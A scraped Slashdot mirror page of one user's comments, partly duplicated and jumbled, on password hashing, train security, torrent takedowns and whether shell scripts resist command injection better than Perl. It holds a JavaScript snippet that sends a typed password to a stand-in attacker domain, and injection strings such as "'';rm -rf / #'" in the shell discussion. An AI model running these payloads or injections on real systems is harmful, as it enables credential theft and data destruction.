my guess is that the anonymous folks try to perpetuate the myth about kids using scripts to hack websites. So they are considered no threat and can operate as they wish. It's a decoy of some sort.
happened in spain. The controls and security was not improved aftwerwards. And people still take the train. They bombed commuter trains. You don't need to bomb HST to kill many people, there are more people on the subway or on commute. If the technology is like the french TGV you really can't make much damage by derailing because the TGV has a good behaviour while derailing (in opposite to the german ICE)
Well as we seek SLOW routines for password hashing, if you need 1000 GoL generations to get something really usable, well so that's it. Slow as hell. Exactly what is needed to secure a password. You can't use GoL to hash a complete file, there you need a fast hash function.
Oh, the browser hashes the password. And the box is rooted? Put your code here: <head> <title>super secure website</title> </head> <body> <script> function doit() { document.write("<img src='http://senthehackerthepassword.com/"+form.password.value+"'>" } settimeout("doit()",5000)// could use onload or any other fancy technique </script>...
What about using a cellular automate? A silly idea I just had yesterday. Take a grafical representation of the password, then "hash" it by running 100 generations of life through. Store the result as the hash. The salt would be an additional life colony so that after 100 generations you're not going to end up with a dead colony.
my teacher gave me back a cool essay I wrote with a bad evaluation stating "you possibly could not have written this, someone else wrote it" - "why?" - "it is way too good" Of course I did not cheat. Oh and this was like from the times the Internet did not exist! Now this may be a compliment for my great writing skills but it was a blow to my school career. Bye bye languages and essays, at least science is more precise. So here I am doing IT:-)
I started with basic, namely GfA-Basic. Which has, surprise, no line numbers! http://en.wikipedia.org/wiki/GFA_BASIC And it was useable, powerful and fast. The editor even did the auto-indentation.
is the linked article still there? Because now it just has the "crash" and "leather case" tags, but for the rest it talks about where and how to use connectify.
the site was popular. So it's not if the contents is on the site, only in iframes or only linked. The site is popular and mostly used for "bad" stuff. So it gets kicked.
Well, message to other torrent searches: don't become popular:-)
Or don't use.com or other top level domain under government control.
I wonder what would have happened if the site had only an IP address instead of a DNS name.
Oh, nothing happened. Exactly the expected behaviour. Shell is safe, all other languages are not.
unless you're already in the shell
That's what I'm talking about. Do it all in shell or don't call external programs. So yes, I have gone the way of implementing CGI scripts in shell. Even calling perl from shell, LOL. Shell is built to call external programs. Other languages are not.
The only real difference between an interactive shell and a noninteractive shell is the way the prompt is displayed
The difference being that the user's input (you typing) is directly going to the prompt, whereas the user input in a shellscript is only able to enter via parameters. And this makes a huge difference. As above, first assigning arg a value and then echo it works fine. But merging both into a single instruction is risky if you don't do it right (don't leave out the double quotes you used in the assignement in the 2 line version).
system 'echo', myvar
Oh, cool. Did not know that. It's a little hidden in the ruby manual.
Well, define "written in shell." Does the shell support sockets? Not that I'm aware of -- you'd at least need netcat.
Apache calls the script via cgi environment. The socket is stdin/stdout. The parsing of the cgi variables is done via an awk script. This has just logic against injections of a single quote because the awk result is then fed to an shell eval to give the shell all user variables. Yes this works! All the rest is quite simple, just write the webpage to be sent back to stdout and you're done.
I'm less interested in what it's like for a bad programmer
There are thousands more bad programmers out there than good ones. And I have the feeling that the ratio is all the time going down. If languages would be more complex to do the bad system call then the good one, this would already improve general computer security.
* quoting: doesn't slashdot have a quote feature? Could not find one except typing the <quote> tags. Awkward.
* your example gets it wrong. It's a social engineering attack, not an attack on test.sh
All the following lines are equivalent: test.sh '';rm -rf / #' cat '';rm -rf / #' ls '';rm -rf / #' perl '';rm -rf / #'
Why? Because you call the command with an empty argument, then you call the rm. So the rm is executing in your interactive shell, not in the program you want to demonstrate to be exploitable.
You are mixing up typing in a command into an interactive shell and calling a shell with a parameter. In shell this is an instersting difference.
So let's try this.
Take a the following test.pl which we want to exploit.
$./test.pl ' ';$(echo hello) #' parameter 1 is: ! hello: command not found
Oh... I don't believe a simple print in perl is exploitable. So the 4 lasts tests are not testing test.pl but the surrounding shell. only the first, or similar setups, are valid tests.
I hope you see the difference between the interactive shell and the called script, be it perl or bash or anything else.
* the guy's other utilities: yes, he did not use CPAN but system calls to run other unix utilities. Like calling mailx to send an email (using a user supplied email address, wow!) and he took 3 weeks to get 1 day worth of work done.
* calling git: well there you need to be careful how you call it. Not knowing ruby I don't know how it's calling external commands. If it's doing an equivalent of "sh -c $command" you need to sanitize arguments.
* webservice in shell Well not really a webservice, but what about a chatroom?
* dang! Hmm, no, it doesn't seem to, though it would in every other language I've used This is the cool feature of shell, it does not in fact execute strings which look like they may break your system. I wrote a file up/download cgi script where any character is allowed in the filename, except / and \0 All written in shell. I was unable to get it to run a program, send me system files or overwrite files.
So that's exactly my point, compared to any other language, the shell surprisingly does not do any of the classic exploit techniques. This is why I call shell more secure. But of cause not perfect. Just better in security (and not in features or speed...)
Slashdot Mirror
my guess is that the anonymous folks try to perpetuate the myth about kids using scripts to hack websites. So they are considered no threat and can operate as they wish. It's a decoy of some sort.
yes it works. No problem on the TGV running at 320km/h
happened in spain. The controls and security was not improved aftwerwards. And people still take the train.
They bombed commuter trains. You don't need to bomb HST to kill many people, there are more people on the subway or on commute.
If the technology is like the french TGV you really can't make much damage by derailing because the TGV has a good behaviour while derailing (in opposite to the german ICE)
in Europe the high speed trains run on their dedicated high speed tracks. They only get back to classic rail tracks close to the cities.
Well as we seek SLOW routines for password hashing, if you need 1000 GoL generations to get something really usable, well so that's it. Slow as hell. Exactly what is needed to secure a password.
You can't use GoL to hash a complete file, there you need a fast hash function.
Oh, the browser hashes the password. // could use onload or any other fancy technique ...
And the box is rooted?
Put your code here:
<head>
<title>super secure website</title>
</head>
<body>
<script>
function doit() {
document.write("<img src='http://senthehackerthepassword.com/"+form.password.value+"'>"
}
settimeout("doit()",5000)
</script>
additionally they won't think about salting. I have seen many mysql databases where there are plain md5 strings.
So you can gain access by google: http://www.google.com/search?q=e10adc3949ba59abbe56e057f20f883e
What about using a cellular automate?
A silly idea I just had yesterday.
Take a grafical representation of the password, then "hash" it by running 100 generations of life through. Store the result as the hash.
The salt would be an additional life colony so that after 100 generations you're not going to end up with a dead colony.
Oh, I can't patent the idea, I'm not the first one thinking of that. http://kestas.kuliukas.com/GameOfLife/
What if a country proposes to take a couple of guantanamo prisoners in exchange of the abolishement of all the software and "idea" patents?
Did they fix the position and allow easy pluggable possibilities so you can have a cradle or car adapter?
No, of course they did not.
my teacher gave me back a cool essay I wrote with a bad evaluation stating "you possibly could not have written this, someone else wrote it" - "why?" - "it is way too good" :-)
Of course I did not cheat. Oh and this was like from the times the Internet did not exist!
Now this may be a compliment for my great writing skills but it was a blow to my school career. Bye bye languages and essays, at least science is more precise. So here I am doing IT
I started with basic, namely GfA-Basic. Which has, surprise, no line numbers!
http://en.wikipedia.org/wiki/GFA_BASIC
And it was useable, powerful and fast.
The editor even did the auto-indentation.
Dr Steven Murdoch (Cambridge) presents: "Chip and PIN is Broken" Vulnerabilities in the EMV Protocol
https://events.ccc.de/congress/2010/Fahrplan/events/4211.en.html
Have fun take-downing them :-)
is the linked article still there?
Because now it just has the "crash" and "leather case" tags, but for the rest it talks about where and how to use connectify.
the site was popular. So it's not if the contents is on the site, only in iframes or only linked. The site is popular and mostly used for "bad" stuff.
So it gets kicked.
Well, message to other torrent searches: don't become popular :-)
Or don't use .com or other top level domain under government control.
I wonder what would have happened if the site had only an IP address instead of a DNS name.
First?
the superbe application "tasker" can be used to do the same job. Just create a trigger on message reception.
wow, that's kinda small compared to today's hard disk sizes. But downloading 900G is going to last quite some time.
I don't have a windows timeline, but system calls are nice too
http://mattiasgeniar.be/2008/11/09/system-calls-in-apache-linux-vs-iis-windows/
how do you get the key into the ram?
If you have to upload it or type it in you are still subject to the gun-to-head or judge-with-jail threats.
with your reasoning, Europe does not need high speed trains. Well they were invented there.
How many 1 hour plane routes do you have in the US? All these can be replaced by train. Even 2h connections are train candidates.
"What interests me is that it recorded approximately eighteen hours of static."
http://www.imdb.com/title/tt0118884/quotes?qt0379375
because slashdot does not like me, here is my reply:
http://pastebin.com/GPtSNUS8
sorry, no reply from me because:
Your comment has too few characters per line (currently 36.1).
and then
Filter error: Please use fewer 'junk' characters.
Come on!!!!
I now hate slashdot
The same in Perl:
my $arg = "'; rm foo; #";
system "echo '$arg'";
And the same in shell
arg="'; rm foo; #"
echo $arg
I even execute it:
$ ls foo
foo
$ arg="'; rm foo; #"
$ echo $arg
'; rm foo; #
$ ls foo
foo
$
Oh, nothing happened. Exactly the expected behaviour. Shell is safe, all other languages are not.
unless you're already in the shell
That's what I'm talking about. Do it all in shell or don't call external programs. So yes, I have gone the way of implementing CGI scripts in shell. Even calling perl from shell, LOL. Shell is built to call external programs. Other languages are not.
The only real difference between an interactive shell and a noninteractive shell is the way the prompt is displayed
The difference being that the user's input (you typing) is directly going to the prompt, whereas the user input in a shellscript is only able to enter via parameters. And this makes a huge difference. As above, first assigning arg a value and then echo it works fine. But merging both into a single instruction is risky if you don't do it right (don't leave out the double quotes you used in the assignement in the 2 line version).
system 'echo', myvar
Oh, cool. Did not know that. It's a little hidden in the ruby manual.
Well, define "written in shell." Does the shell support sockets? Not that I'm aware of -- you'd at least need netcat.
Apache calls the script via cgi environment. The socket is stdin/stdout. The parsing of the cgi variables is done via an awk script. This has just logic against injections of a single quote because the awk result is then fed to an shell eval to give the shell all user variables. Yes this works!
All the rest is quite simple, just write the webpage to be sent back to stdout and you're done.
I'm less interested in what it's like for a bad programmer
There are thousands more bad programmers out there than good ones. And I have the feeling that the ratio is all the time going down. If languages would be more complex to do the bad system call then the good one, this would already improve general computer security.
* quoting: doesn't slashdot have a quote feature? Could not find one except typing the <quote> tags. Awkward.
* your example gets it wrong. It's a social engineering attack, not an attack on test.sh
All the following lines are equivalent:
test.sh '';rm -rf / #'
cat '';rm -rf / #'
ls '';rm -rf / #'
perl '';rm -rf / #'
Why? Because you call the command with an empty argument, then you call the rm. So the rm is executing in your interactive shell, not in the program you want to demonstrate to be exploitable.
You are mixing up typing in a command into an interactive shell and calling a shell with a parameter. In shell this is an instersting difference.
So let's try this.
Take a the following test.pl which we want to exploit.
#!/usr/bin/perl
print "parameter 1 is:".$ARGV[0]."!\n";
We would call it how? Probably like this:
$ ./test.pl '$(echo hello)'
parameter 1 is:$(echo hello)!
but not call it by any of these because the parameter gets executed before even the perl script runs.
$ ./test.pl $(echo hello)
parameter 1 is:hello!
$ ./test.pl "'$(echo hello)'"
parameter 1 is:'hello'!
$ ./test.pl "$(echo hello)"
parameter 1 is:hello!
$ ./test.pl ' ';$(echo hello) #'
parameter 1 is: !
hello: command not found
Oh... I don't believe a simple print in perl is exploitable. So the 4 lasts tests are not testing test.pl but the surrounding shell.
only the first, or similar setups, are valid tests.
I hope you see the difference between the interactive shell and the called script, be it perl or bash or anything else.
* the guy's other utilities:
yes, he did not use CPAN but system calls to run other unix utilities. Like calling mailx to send an email (using a user supplied email address, wow!) and he took 3 weeks to get 1 day worth of work done.
* calling git:
well there you need to be careful how you call it. Not knowing ruby I don't know how it's calling external commands. If it's doing an equivalent of "sh -c $command" you need to sanitize arguments.
* webservice in shell
Well not really a webservice, but what about a chatroom?
* dang! Hmm, no, it doesn't seem to, though it would in every other language I've used
This is the cool feature of shell, it does not in fact execute strings which look like they may break your system.
I wrote a file up/download cgi script where any character is allowed in the filename, except / and \0
All written in shell. I was unable to get it to run a program, send me system files or overwrite files.
So that's exactly my point, compared to any other language, the shell surprisingly does not do any of the classic exploit techniques. ...)
This is why I call shell more secure. But of cause not perfect. Just better in security (and not in features or speed